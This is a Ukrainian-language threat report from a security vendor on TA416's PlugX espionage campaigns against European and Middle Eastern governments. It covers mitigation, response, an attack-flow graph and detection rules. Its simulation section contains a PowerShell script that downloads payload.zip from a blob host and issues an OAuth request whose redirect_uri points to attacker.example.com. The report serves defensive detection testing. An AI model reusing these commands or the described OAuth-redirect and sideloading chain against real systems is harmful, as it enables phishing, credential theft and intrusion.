SOC Prime Bias: Критичний

08 Apr 2026 14:40

Я знову б повернувся до ЄС: TA416 відновлює кампанії шпигунства за європейськими урядами

Author Photo
Ruslan Mikhalov Керівник досліджень загроз у SOC Prime linkedin icon Стежити
Я знову б повернувся до ЄС: TA416 відновлює кампанії шпигунства за європейськими урядами
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Короткий зміст

TA416, група загроз, пов’язана з Китаєм, у середині 2025 року знову розпочала атаки на уряди і дипломатичні установи Європи після періоду зниження активності. Актори поєднують легку розвідку через веб-баги з доставкою налаштованого бекдору PlugX, змінюючи ланцюги початкового доступу, які включають приманки у стилі Cloudflare Turnstile, зловживання перенаправленням OAuth та завантаження з допомогою MSBuild. До березня 2026 року, за повідомленнями, та ж сама тактика розширилася на дипломатиційні цілі Близького Сходу на тлі загострення регіональних напружень, пов’язаних з Іраном. Кампанії спираються на компрометовані поштові скриньки, підписані бінарні файли Windows для завантаження DLL і швидкозмінювану інфраструктуру управління і контролю.

Розслідування

Proofpoint відстежував кілька хвиль спуфінгу, надісланих з безкоштовних поштових адрес і компрометованих урядових акаунтів, з використанням як пікселів відстеження, так і архівів зі зброєю. Архівні ланцюги використовували приховування ZIP з LNK-артефактами для запуску MSI або TAR пакетів, які потім запускали підписані виконувані файли для завантаження PlugX. Паралельно TA416 зловживав перенаправленням OAuth Microsoft Entra ID і використовував перейменовані бінарники MSBuild з шкідливими проектними файлами C# для отримання і виконання виконуваних завдань. Трафік C2 спостерігався через HTTP з RC4-зашифрованими повідомленнями і характерними структурами хедерів/куків, які використовувалися для формування запитів і відповідей.

Пом’якшення

Впровадьте сильну аутентифікацію електронною поштою і посиліть контроль над вхідним вмістом, що надходить від невідомих хмарних провайдерів зберігання. Моніторте підозріле виконання підписаних виконавчих файлів, які зазвичай зловживаються для завантаження (наприклад, cnmpaui.exe і steam_monitor.exe) і нададуть сигнал про аномальну поведінку пошуку DLL. Додайте виявлення для незвичайних підписів хедерів HTTP або куків, пов’язаних із зашифрованим C2, та блокуйте відомі домени/IP TA416 там, де це можливо. Посильте моніторинг кінцевих точок для новоствореної персистенції ключа Run і несподіваних записів файлів у публічні або спільні каталоги.

Відповідь

Якщо виявлено активність, ізолюйте хост, захопіть змінну пам’ять і збережіть відповідні логи кінцевих точок і поштові логи для визначення обсягу. Полюйте на артефакти PlugX, включаючи завантажувач CNCLID.dll, shellcode Canon.dat і mutex dGcEuQhKT. Скасуйте доступ до компрометованих акаунтів електронної пошти, перезавантажте облікові дані та видаліть будь-які заплановані завдання або інші механізми персистенції. Аналізуйте мережеву телеметрію на наявність RC4-зашифрованого HTTP-маяка, потім блокуйте пов’язані домени/URL і розширюйте полювання на всьому середовищі.

"graph TB %% Class Definitions Section classDef action fill:#ffcccc classDef tool fill:#ccccff classDef malware fill:#ffcc99 classDef process fill:#ccffcc %% Nodes action_initial_access["<b>Дія</b> – T1566 Фішинг: Фішингові електронні листи, надіслані з компрометованих акаунтів і загальний фішинг. Одержувачі натискають шкідливі посилання."] class action_initial_access action tool_phishing_email["<b>Інструмент</b> – <b>Ім’я</b>: Фішинговий електронний лист<br/><b>Техніка</b>: T1566"] class tool_phishing_email tool action_user_execution["<b>Дія</b> – T1204 Виконання користувачем: Жертви натискають шкідливе URL-посилання, яке веде до завантаження шкідливого ZIP."] class action_user_execution action tool_malicious_zip["<b>Інструмент</b> – <b>Ім’я</b>: Шкідливий ZIP-архів, що містить ярлик LNK"] class tool_malicious_zip tool action_lnk_smuggling["<b>Дія</b> – T1027.012 Перевезення через ярлики LNK: Ярлик LNK запускає Powershell скрипт."] class action_lnk_smuggling action process_powershell["<b>Процес</b> – Виконання PowerShell для вилучення підписаного бінарного файла"] class process_powershell process tool_signed_binary["<b>Інструмент</b> – <b>Ім’я</b>: cnmpaui.exe (підписаний легітимний бінарний файл)"] class tool_signed_binary tool action_dll_sideloading["<b>Дія</b> – T1218 Виконання системного бінарного проксі: Завантаження DLL завантажує шкідливий DLL."] class action_dll_sideloading action malware_malicious_dll["<b>Шкідливе ПЗ</b> – Шкідливий DLL, завантажений через остороннє завантаження"] class malware_malicious_dll malware action_msbuild_execution["<b>Дія</b> – T1127.001 Довірене середовище розробника: MSBuild використовується для завантаження і виконання PlugX."] class action_msbuild_execution action tool_msbuild["<b>Інструмент</b> – <b>Ім’я</b>: Перейменоване виконуване MSBuild"] class tool_msbuild tool tool_csharp_project["<b>Інструмент</b> – <b>Ім’я</b>: Шкідливий проектний файл C#"] class tool_csharp_project tool malware_plugx["<b>Шкідливе ПЗ</b> – Навантаження PlugX"] class malware_plugx malware action_persistence["<b>Дія</b> – T1037.001 Персистенція через ключ реєстру Run і модифікацію ярликів."] class action_persistence action process_registry["<b>Процес</b> – Створення ключа реєстру Run у HKCUSoftwareMicrosoftWindowsCurrentVersionRun"] class process_registry process action_defense_evasion["<b>Дія</b> – T1553.002 Підрив довіри: Зловживання підписаними бінарними файлами та важким обфускуванням."] class action_defense_evasion action action_apddomain_hijack["<b>Дія</b> – T1574.014 Перехоплення виконання потоку: Перехоплення AppDomainManager через ланцюг MSBuild"] class action_apddomain_hijack action action_c2["<b>Дія</b> – T1071.001 Веб-протоколи та T1573.001 Зашифрований канал: HTTP C2 з RC4 шифром"] class action_c2 action process_c2_communication["<b>Процес</b> – Зашифроване HTTP сполучення з сервером C2"] class process_c2_communication process action_exfiltration["<b>Дія</b> – T1041 Експіляція через канал C2: Дані відправляються зашифрованим каналом"] class action_exfiltration action %% Connections action_initial_access –>|доставляє| tool_phishing_email tool_phishing_email –>|містить посилання, що веде до| action_user_execution action_user_execution –>|завантажує| tool_malicious_zip tool_malicious_zip –>|містить| action_lnk_smuggling action_lnk_smuggling –>|виконує| process_powershell process_powershell –>|витягує| tool_signed_binary tool_signed_binary –>|завантажує| action_dll_sideloading action_dll_sideloading –>|завантажує| malware_malicious_dll malware_malicious_dll –>|готує середовище для| action_msbuild_execution action_msbuild_execution –>|використовує| tool_msbuild tool_msbuild –>|обробляє| tool_csharp_project tool_csharp_project –>|завантажує і запускає| malware_plugx malware_plugx –>|створює| action_persistence action_persistence –>|пише| process_registry action_persistence –>|модифікує ярлик для| action_lnk_smuggling action_persistence –>|включає| action_defense_evasion action_defense_evasion –>|застосовує| action_apddomain_hijack action_apddomain_hijack –>|включає| action_c2 action_c2 –>|спілкується через| process_c2_communication process_c2_communication –>|експілотовує дані через| action_exfiltration "

Потік атаки

Виявлення

Підозрілі витягнуті файли з архіву (через file_event)

Команда SOC Prime
03 квітня 2026

Підозрілі файли в профілі публічного користувача (через file_event)

Команда SOC Prime
03 квітня 2026

Можлива інфільтрація/експіляція даних/C2 через сервіси/інструменти третіх сторін (через dns)

Команда SOC Prime
03 квітня 2026

Можливе зловживання перенаправленням OAuth (через proxy)

Команда SOC Prime
03 квітня 2026

Індикатори компрометації (HashSha256) для виявлення: Я б повернувся до ЄС: TA416 відновлює шпигунські кампанії проти європейських урядів Частина 3

Правила SOC Prime AI
03 квітня 2026

Індикатори компрометації (HashSha256) для виявлення: Я б повернувся до ЄС: TA416 відновлює шпигунські кампанії проти європейських урядів Частина 2

Правила SOC Prime AI
03 квітня 2026

Індикатори компрометації (HashSha256) для виявлення: Я б повернувся до ЄС: TA416 відновлює шпигунські кампанії проти європейських урядів Частина 1

Правила SOC Prime AI
03 квітня 2026

Виявлення доменів управління і контролю TA416 [Windows Network Connection]

Правила SOC Prime AI
03 квітня 2026

Доставка шкідливого ПЗ TA416 через Microsoft Azure Blob Storage і зловживання OAuth [Azure Activity Logs]

Правила SOC Prime AI
03 квітня 2026

Екзекуційна симуляція

Передумова: Телеметрія та передпольотна перевірка повинні бути пройдені.

Обгрунтування: Цей розділ детально описує точний виконання техніки супротивника (TTP), призначену для спрацьовування правила виявлення. Команди і наратив безпосередньо відображають ідентифіковані TTP і мають на меті створити точну телеметрію, очікувану логікою виявлення.

  • Опис нападу та команди:

    1. Стадія завантаження пейлоаду: Зловмисник завантажує шкідливий ZIP файл (payload.zip) у контейнер Azure Blob mydownload.z29.web.core.windows.net.
    2. Створіть приманкову сторінку: Шкідлива HTML-сторінка, що розміщена на тому ж домені, містить тег <img> який вказує на URL Azure Blob (ініціюючи завантаження) and прихований <iframe> який відразу перенаправляє жертву до точки авторизації Microsoft Entra ID OAuth 2.0 з redirect_uri вказуючи на домен під контролем зловмисника.
    3. Взаємодія жертви: Жертва відвідує приманкову сторінку (наприклад, через фішинговий електронний лист). Браузер здійснює два HTTP GET запити поспіль — один на URL Blob, і один на URL OAuth. Журнали активності Azure реєструють обидва запити в тій самій сесії проксі, відповідаючи умові правила selection_blob AND selection_oauth .
  • Сценарій регресійного тестування: (виконаний з комп’ютера жертви, щоб відтворити телеметрію)

    # Симуляція запуску тригера TA416 Azure Blob + OAuth
    # Крок 1: Завантаження шкідливого блока (симульоване за допомогою безпечного файла)
    Invoke-WebRequest -Uri "https://mydownload.z29.web.core.windows.net/payload.zip" -OutFile "$env:TEMPpayload.zip"
    
    # Крок 2: Негайно викликай URL авторизації OAuth (змодельовано перенаправлення)
    $oauthUrl = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=FAKE_CLIENT_ID&response_type=code&redirect_uri=https://attacker.example.com/callback"
    Invoke-WebRequest -Uri $oauthUrl -Method GET -UseBasicParsing | Out-Null
    
    Write-Host "Симуляція завершена – обидва URL запитані."
  • Команди очищення:

    # Видалити завантажений файл
    Remove-Item -Path "$env:TEMPpayload.zip" -Force -ErrorAction SilentlyContinue
    
    # Очистити змінні сесії PowerShell
    Remove-Variable -Name oauthUrl -ErrorAction SilentlyContinue